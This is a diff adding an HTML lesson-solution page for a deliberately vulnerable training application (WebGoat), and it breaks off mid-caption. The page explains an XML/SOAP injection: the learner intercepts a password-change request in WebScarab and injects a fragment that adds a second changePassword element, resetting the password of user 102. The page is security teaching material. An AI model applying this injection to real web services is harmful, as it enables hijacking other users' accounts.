+	margin-bottom:0cm;
+	margin-left:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan lines-together;
+	page-break-after:avoid;
+	mso-outline-level:2;
+	font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+p.MsoCaption, li.MsoCaption, div.MsoCaption
+	{mso-style-noshow:yes;
+	mso-style-qformat:yes;
+	mso-style-next:Normal;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	font-weight:bold;}
+p.MsoEnvelopeReturn, li.MsoEnvelopeReturn, div.MsoEnvelopeReturn
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;}
+a:link, span.MsoHyperlink
+	{mso-style-noshow:yes;
+	color:blue;
+	text-decoration:underline;
+	text-underline:single;}
+a:visited, span.MsoHyperlinkFollowed
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	color:purple;
+	mso-themecolor:followedhyperlink;
+	text-decoration:underline;
+	text-underline:single;}
+p
+	{mso-style-noshow:yes;
+	mso-margin-top-alt:auto;
+	margin-right:0cm;
+	mso-margin-bottom-alt:auto;
+	margin-left:0cm;
+	mso-pagination:widow-orphan;
+	font-size:12.0pt;
+	font-family:"Times New Roman","serif";
+	mso-fareast-font-family:"Times New Roman";}
+pre
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"HTML Preformatted Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt;
+	font-size:10.0pt;
+	font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";}
+p.MsoAcetate, li.MsoAcetate, div.MsoAcetate
+	{mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-link:"Balloon Text Char";
+	margin:0cm;
+	margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-fareast-font-family:"Times New Roman";}
+span.Heading1Char
+	{mso-style-name:"Heading 1 Char";
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 1";
+	mso-ansi-font-size:16.0pt;
+	mso-bidi-font-size:16.0pt;
+	font-family:"MS Mincho";
+	mso-ascii-font-family:"MS Mincho";
+	mso-fareast-font-family:"MS Mincho";
+	mso-hansi-font-family:"MS Mincho";
+	mso-bidi-font-family:Arial;
+	mso-font-kerning:16.0pt;
+	mso-fareast-language:JA;
+	font-weight:bold;}
+span.Heading2Char
+	{mso-style-name:"Heading 2 Char";
+	mso-style-noshow:yes;
+	mso-style-priority:9;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Heading 2";
+	mso-ansi-font-size:13.0pt;
+	mso-bidi-font-size:13.0pt;
+	font-family:"Cambria","serif";
+	mso-ascii-font-family:Cambria;
+	mso-ascii-theme-font:major-latin;
+	mso-fareast-font-family:"Times New Roman";
+	mso-fareast-theme-font:major-fareast;
+	mso-hansi-font-family:Cambria;
+	mso-hansi-theme-font:major-latin;
+	color:#4F81BD;
+	mso-themecolor:accent1;
+	font-weight:bold;}
+span.HTMLPreformattedChar
+	{mso-style-name:"HTML Preformatted Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"HTML Preformatted";
+	font-family:"Courier New";
+	mso-ascii-font-family:"Courier New";
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:"Courier New";
+	mso-bidi-font-family:"Courier New";}
+span.BalloonTextChar
+	{mso-style-name:"Balloon Text Char";
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-unhide:no;
+	mso-style-locked:yes;
+	mso-style-link:"Balloon Text";
+	mso-ansi-font-size:8.0pt;
+	mso-bidi-font-size:8.0pt;
+	font-family:"Tahoma","sans-serif";
+	mso-ascii-font-family:Tahoma;
+	mso-fareast-font-family:"Times New Roman";
+	mso-hansi-font-family:Tahoma;
+	mso-bidi-font-family:Tahoma;}
+.MsoChpDefault
+	{mso-style-type:export-only;
+	mso-default-props:yes;
+	font-size:10.0pt;
+	mso-ansi-font-size:10.0pt;
+	mso-bidi-font-size:10.0pt;
+	mso-ascii-font-family:Arial;
+	mso-fareast-font-family:Calibri;
+	mso-fareast-theme-font:minor-latin;
+	mso-hansi-font-family:Arial;
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+@page Section1
+	{size:595.3pt 841.9pt;
+	margin:70.55pt 56.9pt 70.55pt 56.9pt;
+	mso-header-margin:35.3pt;
+	mso-footer-margin:35.3pt;
+	mso-title-page:yes;
+	mso-paper-source:0;}
+div.Section1
+	{page:Section1;}
+-->
+</style>
+<!--[if gte mso 10]>
+<style>
+ /* Style Definitions */
+ table.MsoNormalTable
+	{mso-style-name:"Table Normal";
+	mso-tstyle-rowband-size:0;
+	mso-tstyle-colband-size:0;
+	mso-style-noshow:yes;
+	mso-style-priority:99;
+	mso-style-qformat:yes;
+	mso-style-parent:"";
+	mso-padding-alt:0cm 5.4pt 0cm 5.4pt;
+	mso-para-margin:0cm;
+	mso-para-margin-bottom:.0001pt;
+	mso-pagination:widow-orphan;
+	font-size:10.0pt;
+	font-family:"Arial","sans-serif";
+	mso-bidi-font-family:"Times New Roman";
+	mso-bidi-theme-font:major-bidi;}
+</style>
+<![endif]--><!--[if gte mso 9]><xml>
+ <o:shapedefaults v:ext="edit" spidmax="4098"/>
+</xml><![endif]--><!--[if gte mso 9]><xml>
+ <o:shapelayout v:ext="edit">
+  <o:idmap v:ext="edit" data="1"/>
+ </o:shapelayout></xml><![endif]-->
+</head>
+
+<body lang=EN-US link=blue vlink=purple style='tab-interval:36.0pt'>
+
+<div class=Section1>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Lesson Plan Title:</span></b><span
+style='font-family:"Arial","sans-serif"'> How to Perform Web Service SAX
+Injection<o:p></o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Concept / Topic To Teach: <o:p></o:p></span></b></p>
+
+<!-- Start Instructions -->
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Web Services
+communicate through the use of SOAP requests. These requests are submitted to a
+web service in an attempt to execute a function defined in the web service
+definition language (WSDL) file. <o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>General Goal(s): <o:p></o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Some web
+interfaces make use of Web Services in the background. If the frontend relies
+on the web service for all input validation, it may be possible to corrupt the
+XML that the web interface sends. <br style='mso-special-character:line-break'>
+<![if !supportLineBreakNewLine]><br style='mso-special-character:line-break'>
+<![endif]><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>In this
+exercise, try to change the password for a user other than 101.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif";mso-no-proof:
+yes'><!--[if gte vml 1]><v:shapetype id="_x0000_t75" coordsize="21600,21600"
+ o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f"
+ stroked="f">
+ <v:stroke joinstyle="miter"/>
+ <v:formulas>
+  <v:f eqn="if lineDrawn pixelLineWidth 0"/>
+  <v:f eqn="sum @0 1 0"/>
+  <v:f eqn="sum 0 0 @1"/>
+  <v:f eqn="prod @2 1 2"/>
+  <v:f eqn="prod @3 21600 pixelWidth"/>
+  <v:f eqn="prod @3 21600 pixelHeight"/>
+  <v:f eqn="sum @0 0 1"/>
+  <v:f eqn="prod @6 1 2"/>
+  <v:f eqn="prod @7 21600 pixelWidth"/>
+  <v:f eqn="sum @8 21600 0"/>
+  <v:f eqn="prod @7 21600 pixelHeight"/>
+  <v:f eqn="sum @10 21600 0"/>
+ </v:formulas>
+ <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
+ <o:lock v:ext="edit" aspectratio="t"/>
+</v:shapetype><v:shape id="Picture_x0020_39" o:spid="_x0000_i1029" type="#_x0000_t75"
+ style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image001.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/WsSAXInjection_files/image002.jpg" v:shapes="Picture_x0020_39"><![endif]></span><span
+style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span><o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'>Solution:<o:p></o:p></span></b></p>
+
+<p class=MsoNormal><b style='mso-bidi-font-weight:normal'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></b></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>To succeed
+this lesson it is required to reset the password of the user with a different
+user-ID then 101 (which is your user-ID)<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>.<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>When you fill
+out a password and click on “Go!” the following XML request will be created,
+submit and parsed by the SAX parser:<o:p></o:p></span></p>
+
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<pre><span style='color:black'>&lt;?xml version='1.0' encoding='UTF-8'?&gt;<o:p></o:p></span></pre><pre><span
+style='color:black'>&lt;wsns0:Envelope<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>  </span>xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>  </span>xmlns:xsd='http://www.w3.org/2001/XMLSchema'<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>  </span>xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>  </span>xmlns:wsns1='http://lessons.webgoat.owasp.org'&gt;<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>  </span>&lt;wsns0:Body&gt;<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>    </span>&lt;wsns1:changePassword&gt;<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>      </span>&lt;id xsi:type='xsd:int'&gt;101&lt;/id&gt;<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>      </span>&lt;password xsi:type='xsd:string'&gt;[password]&lt;/password&gt;<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>    </span>&lt;/wsns1:changePassword&gt;<o:p></o:p></span></pre><pre><span
+style='color:black'><span style='mso-spacerun:yes'>  </span>&lt;/wsns0:Body&gt;<o:p></o:p></span></pre><pre><span
+style='color:black'>&lt;/wsns0:Envelope&gt;<o:p></o:p></span></pre>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>SAX parsers will parse anything that
+is well-formed, meaning that there are matching end and close tags and that the
+schema is correct. When you are able to add a new changePAssword element with
+corresponding id tag and password tag, the SAX parser will be more than happy
+to change the password for the user-ID provided.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>So you need to have something like
+this as a final result:<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>&lt;?xml version='1.0'
+encoding='UTF-8'?&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>&lt;wsns0:Envelope<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'> 
+</span>xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'> 
+</span>xmlns:xsd='http://www.w3.org/2001/XMLSchema'<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'> 
+</span>xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'> 
+</span>xmlns:wsns1='http://lessons.webgoat.owasp.org'&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'> 
+</span>&lt;wsns0:Body&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>   
+</span>&lt;wsns1:changePassword&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>     
+</span>&lt;id xsi:type='xsd:int'&gt;101&lt;/id&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>     
+</span>&lt;password xsi:type='xsd:string'&gt;[password]&lt;/password&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>   
+</span>&lt;/wsns1:changePassword&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>   
+</span>&lt;wsns1:changePassword&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>     
+</span>&lt;id xsi:type='xsd:int'&gt;102&lt;/id&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>     
+</span>&lt;password xsi:type='xsd:string'&gt;notforyoutoknow&lt;/password&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>   
+</span>&lt;/wsns1:changePassword&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'> 
+</span>&lt;/wsns0:Body&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>&lt;/wsns0:Envelope&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>This requires to inject:<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>newpassword&lt;/password&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>   
+</span>&lt;/wsns1:changePassword&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>   
+</span>&lt;wsns1:changePassword&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span
+style='mso-spacerun:yes'> </span><span style='mso-spacerun:yes'>    
+</span>&lt;id xsi:type='xsd:int'&gt;102&lt;/id&gt;<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><span style='mso-spacerun:yes'>     
+</span>&lt;password xsi:type='xsd:string'&gt;notforyoutoknow<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>There are field-limitations in the
+HTML input field, so it is required to intercept the HTTP Request with
+WebScarab and replace the parameter password with the payload.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>Enter a password ‘test’ and click
+“Go!”. <o:p></o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
+ id="Picture_x0020_40" o:spid="_x0000_i1028" type="#_x0000_t75" style='width:480pt;
+ height:277.5pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image003.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=640 height=370
+src="/WebGoat/lesson_solutions/WsSAXInjection_files/image004.jpg" v:shapes="Picture_x0020_40"><![endif]></span></p>
+
+<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
+<!--[if supportFields]><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>113</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Reset password with test</p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'>Intercept the request in WebScarab and
+replace the string test with the payload.<o:p></o:p></span></p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
+
+<p class=MsoNormal style='page-break-after:avoid;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='font-family:"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape
+ id="Picture_x0020_41" o:spid="_x0000_i1027" type="#_x0000_t75" style='width:481.5pt;
+ height:345pt;visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image005.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/WsSAXInjection_files/image006.jpg" v:shapes="Picture_x0020_41"><![endif]></span></p>
+
+<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
+<!--[if supportFields]><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
+field-separator'></span><![endif]--><span style='mso-no-proof:yes'>114</span><!--[if supportFields]><span
+style='mso-element:field-end'></span><![endif]--> Intercept request</p>
+
+<p class=MsoNormal style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><o:p>&nbsp;</o:p></p>
+
+<p class=MsoNormal style='page-break-after:avoid;tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'><span
+style='mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_42"
+ o:spid="_x0000_i1026" type="#_x0000_t75" style='width:481.5pt;height:345pt;
+ visibility:visible;mso-wrap-style:square'>
+ <v:imagedata src="/WebGoat/lesson_solutions/WsSAXInjection_files/image007.png" o:title=""/>
+</v:shape><![endif]--><![if !vml]><img width=642 height=460
+src="/WebGoat/lesson_solutions/WsSAXInjection_files/image008.jpg" v:shapes="Picture_x0020_42"><![endif]></span></p>
+
+<p class=MsoCaption style='tab-stops:45.8pt 91.6pt 137.4pt 183.2pt 229.0pt 274.8pt 320.6pt 366.4pt 412.2pt 458.0pt 503.8pt 549.6pt 595.4pt 641.2pt 687.0pt 732.8pt'>Figure
+<!--[if supportFields]><span style='mso-element:field-begin'></span><span
+style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC <span style='mso-element:
